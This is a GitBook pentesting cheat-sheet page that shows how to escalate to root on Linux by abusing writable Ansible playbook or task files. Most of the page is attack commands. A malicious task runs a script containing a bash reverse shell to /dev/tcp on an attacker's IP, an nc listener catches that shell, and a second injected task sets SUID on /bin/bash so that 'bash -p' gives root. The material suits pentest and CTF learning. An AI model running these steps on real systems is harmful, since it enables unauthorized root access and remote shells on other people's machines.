Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • PrivEsc with Tasks
  • PrivEsc with Automation Task

Ansible Playbook Privilege Escalation

Ansible Playbooks are lists of tasks that automatically execute against hosts.

NextApache Conf Privilege Escalation

Last updated 1 year ago

First off, check the content of playbook in /opt/ansible/playbooks. For instance, a file named “httpd.yaml”.

- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
Copied!

Next, check the content of configure files in /opt/ansible/roles/geerlingguy.apache/tasks. And add the exploitable file in this. For example, a file named “shell.yml”.

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Copied!

Create a exploit for reverse shell.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
Copied!

Then open a listener in local machine.

nc -lvnp <local-port>
Copied!

At the end, execute “ansible”

ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
Copied!

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (tasks/), we can inject arbitrary commands in yaml file. For example, create a new file /opt/ansible/tasks/evil.yaml.

- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true
Copied!

After a while, we can escalate the root privilege by executing the following command.

/bin/bash -p

PrivEsc with Tasks
PrivEsc with Automation Task
Page cover image